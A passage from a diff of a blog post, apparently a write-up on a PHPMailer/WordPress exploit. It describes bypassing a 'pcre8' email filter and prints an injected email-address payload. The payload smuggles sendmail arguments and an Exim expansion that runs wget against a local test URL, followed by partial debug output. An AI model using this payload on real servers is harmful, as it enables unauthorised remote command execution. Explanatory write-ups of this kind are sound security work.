AlvFolgado/alvfolgado.github.io/_posts/2017-07-02-phpmailerwordpress.md

 [...]
 ```

-Fortunately,LegalHackers studied ways to bypass this blockage using as reference the email RFC where we should be able to use spaces (This is very well explained by them, the link in the Documentation Section).
-They have been give us information in how to bypass 'pcre8'.
-If other filter pattern is used the exploit will not work.
+Fortunately, LegalHackers studied ways to bypass this blockage using as reference the email RFC where we should be able to use spaces (This is very well explained by them, the link in the References Section).
+They have gave us information about how to bypass 'pcre8' email filter.
+If other filter pattern is used in PHPMailer, the exploit will not work correctly.

 ```bash
 Payload:
 email@dd(tmp1 -be ${run{/usr/bin/wget${substr{10}{1}{$tod_log}}http://127.0.0.1/test}} tmp2)

 Commandeugger:
 Received: /usr/sbin/sendmail
 Received: -femail@dd(tmp1